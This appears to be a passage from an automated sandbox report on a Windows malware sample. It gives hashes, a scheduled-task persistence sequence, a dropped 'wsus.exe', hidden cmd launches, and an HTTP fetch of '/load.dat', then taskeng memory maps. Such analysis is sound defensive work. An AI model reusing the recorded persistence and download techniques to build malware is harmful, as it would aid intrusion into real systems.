SHA256: 2a8e0c425456503344bd480c83e7151147b474783e1d6d74e3b6d1d5d5b34ed9
c:\programdata\settings\wsus_41a480.tmp 646.50 KB MD5: 192aead1e464431f616fc210ab18a6af
SHA1: 84e0756eef6e66bd8cc9a42fee4fa69ab21964ca
SHA256: ac3fb7067fed4e4db651f8261553d379a980eaa8756202b4a8daa8e88299a2ef
c:\programdata\settings\wsus.exe 646.50 KB MD5: 0be249bf01a6b8380ab31aa3f75e62d3
SHA1: 1caef216eccbc07949836f814dcd9818a4c75d6d
SHA256: 7f61258418b89942aa8e7bf2563ce11a05402d3ccf405a18e3d0a4d7a7f9ee41
Host Behavior
COM (9)
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Create 148BD52A-A2AB-11CE-B11F-00AA00530503 148BD527-A2AB-11CE-B11F-00AA00530503 cls_context = CLSCTX_INPROC_SERVER True 1
Execute TaskScheduler ITaskService method_name = Connect, user = 1634856, domain = 1984923861 True 1
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_LOGON, new_interface = IDailyTrigger True 1
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2016-01-01T12:05:00 True 1
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
File (278)
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\Settings\wsus_41a480.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\ProgramData\Settings\wsus_41a480.tmp desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\ProgramData\Settings\wsus.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create Directory C:\ProgramData\Settings - True 1
Get Info C:\ProgramData\Settings\wsus_41a480.tmp type = size True 1
Read C:\ProgramData\Settings\wsus_41a480.tmp size = 662016, size_out = 662016 True 1
Write - size = 16 False 1
Write - size = 3 False 1
Write C:\ProgramData\Settings\wsus_41a480.tmp size = 1024 True 249
Write C:\ProgramData\Settings\wsus.exe size = 662016 True 1
Delete Directory C:\ProgramData\Settings - False 1
Delete Directory C:\ProgramData\Microsoft\Enc - False 1
Delete Directory C:\ProgramData\AMMYY - False 1
Delete Directory C:\ProgramData\Foundation - False 1
Delete Directory C:\ProgramData\Foundation1 - False 1
Delete C:\ProgramData\AMMYY\wmihost.exe - False 1
Delete C:\ProgramData\AMMYY\settings3.bin - False 1
Delete C:\ProgramData\Foundation\wmites.exe - False 1
Delete C:\ProgramData\Foundation\settings3.bin - False 1
Delete C:\ProgramData\Foundation1\wmites.exe - False 1
Delete C:\ProgramData\Foundation1\settings3.bin - False 1
Delete C:\ProgramData\Microsoft\wsus.exe - False 1
Delete C:\ProgramData\Microsoft\settings3.bin - False 1
Delete C:\ProgramData\Settings\wsus_41a480.tmp - False 2
Delete C:\ProgramData\Settings\wsus.exe - False 1
Delete C:\ProgramData\Settings\wsus_41a480.tmp - True 1
Process (7)
Operation Process Additional Information Success Count Logfile
Create cmd show_window = SW_HIDE True 4
Create C:\ProgramData\Settings\wsus.exe os_pid = 0xa40, creation_flags = CREATE_DETACHED_PROCESS, CREATE_NORMAL_PRIORITY_CLASS, show_window = SW_HIDE True 1
Create C:\Windows\system32\cmd.exe show_window = SW_HIDE True 2
Module (689)
Operation Module Additional Information Success Count Logfile
Load gsbcconf.dll base_address = 0x0 False 1
Load odbcconf.dll base_address = 0x74e60000 True 1
Load Kernel32.dll base_address = 0x75440000 True 1
Load User32.dll base_address = 0x75d10000 True 2
Load kernel32 base_address = 0x75440000 True 1
Load shell32.dll base_address = 0x76140000 True 9
Load wininet.dll base_address = 0x75190000 True 251
Load ntdll base_address = 0x775d0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 253
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75d10000 True 1
Get Handle c:\windows\syswow64\gdi32.dll base_address = 0x75e10000 True 1
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x77130000 True 1
Get Handle c:\windows\syswow64\shell32.dll base_address = 0x76140000 True 1
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75f40000 True 1
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75c30000 True 1
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x753e0000 True 1
Get Handle c:\users\qj4suk~1\appdata\local\temp\cmd_.exe base_address = 0x400000 True 1
Get Filename gsbcconf.dll process_name = c:\users\qj4suk~1\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe, size = 260 True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75454a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x754514c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7545110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x754511f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75457a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x754511c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x754511a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75451b00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ReadProcessMemory, address_out = 0x7546cfcc True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x754510ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x7545196e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x754551b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75451282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75453ed3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75451410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetHandleInformation, address_out = 0x7547cb69 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x7546eceb True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75455929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75472a9d True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75473102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75472b7a True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75455a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75451700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x754511e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x754514fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75454c6b True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x754549d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7545492b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x754514b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7547594d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x754534b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75451072 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x754533a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringA, address_out = 0x7547b2b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7547d526 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RemoveDirectoryA, address_out = 0x754d44bf True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x754553c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75455444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75451725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExW, address_out = 0x75451ae5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentActCtx, address_out = 0x7546d551 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x754517b9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75469b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7547735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75478baf True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7547896c True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75453f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75477aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x754d454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7546c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75451328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x754f7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7545588e True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x754513f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75451222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75451245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DecodeSystemPointer, address_out = 0x7760ad98 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7545469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75451946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75455189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7547d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7545179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75454493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7545495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7547d1d4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75453587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75452d3c True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 1
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x754558a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7547d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x754551a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75454950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75455235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75454a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7545192e True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75451400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75451450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x754514e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75453531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75451916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75454d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75453509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x754551e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x754551cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7545170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7547772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x754587c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75451809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7546d802 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x754549ad True 1
Get Address c:\windows\syswow64\user32.dll function = SetCursor, address_out = 0x75d341f6 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x75d4e061 True 1
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x75d33698 True 1
Get Address c:\windows\syswow64\user32.dll function = CharUpperBuffA, address_out = 0x75d2fe47 True 1
Get Address c:\windows\syswow64\user32.dll function = CharUpperBuffW, address_out = 0x75d2fc5d True 1
Get Address c:\windows\syswow64\user32.dll function = SetMenu, address_out = 0x75d32bb9 True 1
Get Address c:\windows\syswow64\user32.dll function = LoadStringA, address_out = 0x75d2db21 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x75d3ae5f True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetTextMetricsW, address_out = 0x75e282b2 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetTextFaceW, address_out = 0x75e29936 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x7714157a True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x7638fb26 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76387078 True 1
Get Address c:\windows\syswow64\shell32.dll function = DragFinish, address_out = 0x76354e4a True 1
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75f89d0b True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75f67259 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeEx, address_out = 0x75f809ad True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75f5b636 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoCreateGuid, address_out = 0x75f815d5 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75f886d3 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75c33eae True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75c33ed5 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75c33e59 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75c34642 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7540c45b True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75454f2b True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7545359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75451252 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75454208 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75454d28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x754d4195 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7545d31f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7546ee7e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7546f088 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x754d4761 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x754ccd11 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x754d424f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x754d46b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x754e6676 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x754d4751 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x754e65f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x754d47c1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x754d47e1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x754d47f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceFrequency, address_out = 0x754541f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsBadCodePtr, address_out = 0x75472b34 True 1
System (4)
Operation Additional Information Success Count Logfile
Sleep duration = 3000 milliseconds (3.000 seconds) True 2
Get Time type = System Time, time = 1627-02-02 21:37:10 (UTC) True 1
Get Info type = Operating System True 1
Mutex (9)
Operation Additional Information Success Count Logfile
Open desired_access = SYNCHRONIZE False 9
Environment (3)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Get Environment String name = ComSpec, result_out = C:\Windows\system32\cmd.exe True 2
Debug (1)
Operation Process Additional Information Success Count Logfile
Print c:\users\qj4suk~1\appdata\local\temp\cmd_.exe type = DEBUG_STRING, text = C:\ProgramData\Settings\wsus_41a480.tmp True 1
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 178 bytes
Total Data Received 250.00 KB
Contacted Host Count 1
Contacted Hosts
HTTP Session #1
Information Value
Server Name
Server Port 80
Data Sent 178
Data Received 256000
Operation Additional Information Success Count Logfile
Open Session access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = http, server_name =, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /load.dat, flags = INTERNET_FLAG_RELOAD True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = True 1
Read Response size = 1024, size_out = 1024 True 250
Process #7: taskeng.exe
0 0
Information Value
ID #7
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {7366205D-AB28-4705-9A68-ED75B1319F38} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:10, Reason: Created Scheduled Job
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:28
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x4b0
Parent PID 0x334 (Unknown)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 388
0x 994
0x 6C4
0x 4C4
0x 4BC
0x 4B4
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x0033ffff Private Memory Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000590000 0x00590000 0x00717fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000720000 0x00720000 0x008a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008b0000 0x008b0000 0x01caffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001cb0000 0x01cb0000 0x020a2fff Pagefile Backed Memory Readable True False False -
private_0x0000000002130000 0x02130000 0x021affff Private Memory Readable, Writable True False False -
private_0x00000000021b0000 0x021b0000 0x022affff Private Memory Readable, Writable True False False -
private_0x00000000022f0000 0x022f0000 0x0236ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02480000 0x0274efff Memory Mapped File Readable False False False -
pagefile_0x0000000002750000 0x02750000 0x0282efff Pagefile Backed Memory Readable True False False -
private_0x0000000002840000 0x02840000 0x028bffff Private Memory Readable, Writable True False False -
private_0x0000000002920000 0x02920000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x02a5ffff Private Memory Readable, Writable True False False -
private_0x0000000002b10000 0x02b10000 0x02b8ffff Private Memory Readable, Writable True False False -
user32.dll 0x771d0000 0x772c9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x772d0000 0x773eefff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
taskeng.exe 0xfffb0000 0x100023fff Memory Mapped File Readable, Writable, Executable False False False -
tschannel.dll 0x7fefa630000 0x7fefa638fff Memory Mapped File Readable, Writable, Executable False False False -
ktmw32.dll 0x7fefaa20000 0x7fefaa29fff Memory Mapped File Readable, Writable, Executable False False False -
xmllite.dll 0x7fefb730000 0x7fefb764fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7fefb770000 0x7fefb787fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7fefbb50000 0x7fefbba5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7fefc930000 0x7fefc976fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7fefcc30000 0x7fefcc46fff Memory Mapped File Readable, Writable, Executable False False False -
wevtapi.dll 0x7fefce60000 0x7fefceccfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7fefd200000 0x7fefd224fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7fefd230000 0x7fefd23efff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x7fefd320000 0x7fefd333fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7fefd430000 0x7fefd49afff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefd710000 0x7fefd912fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7fefd970000 0x7fefd98efff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7fefdd90000 0x7fefdd9dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7fefdda0000 0x7fefde76fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7fefdf20000 0x7fefe028fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7fefe030000 0x7fefe05dfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefe060000 0x7fefe0c6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7fefe0d0000 0x7fefe1fcfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe2a0000 0x7fefe37afff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7fefe4c0000 0x7fefe588fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7fefe590000 0x7fefe628fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefe8f0000 0x7fefe960fff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feff710000 0x7feff710fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True False False -
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd9fff Private Memory Readable, Writable True False False -
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True False False -
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffdcfff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Process #8: taskeng.exe
0 0
Information Value
ID #8
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {F0BF9717-EB8A-4C23-8803-85A71A393FD9} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:11, Reason: Created Scheduled Job
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:27
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xbf0
Parent PID 0x334 (Unknown)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BEC
0x BE8
0x BE4
0x BDC
0x 830
0x 370
0x 418
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
